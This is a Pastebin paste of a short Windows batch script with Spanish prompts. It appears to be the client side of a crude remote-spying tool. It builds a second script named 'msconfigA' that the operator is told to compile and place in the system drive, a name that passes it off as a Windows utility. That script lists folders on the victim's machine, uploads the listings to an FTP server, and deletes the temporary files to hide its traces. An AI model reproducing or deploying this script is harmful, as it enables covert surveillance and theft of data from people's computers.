yosoysupercholo

cliente

Jun 20th, 2012
78
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 0.53 KB | None | 0 0
  1. echo off
  2. cls
  3. cd\
  4.  
  5. (
  6. user
  7. pass
  8. type binary
  9. get dir.txt
  10. bye
  11. )>>1.txt
  12. ftp -v -s:c:\1.txt cuenta-ftp
  13. type dir.txt
  14. set /p m="Escriva la ruta por la que desea moverse>"
  15.  
  16. (
  17. cd^\
  18. cd ^%m^%
  19. dir^>dir.txt
  20. ^(
  21. user
  22. pass
  23. type binary
  24. put dir.txt
  25. bye
  26. ^)^>^>1.txt
  27. ftp -v -s^:c^:^\1.txt cuenta-ftp
  28. del 1.txt
  29. del dir.txt
  30. )>>msconfigA.txt
  31. start msconfigA.txt
  32. msg Ahora paselo a exe y guardelo en %systemdrive%
  33. cls
  34. pause
  35. del msconfig.txt
  36.  
  37. (
  38. user
  39. pass
  40. type binary
  41. put msconfigA.exe
  42. bye
  43. )>1.txt
  44. ftp -v -s:c:\1.txt cuenta-ftp
Advertisement
Add Comment
Please, Sign In to add comment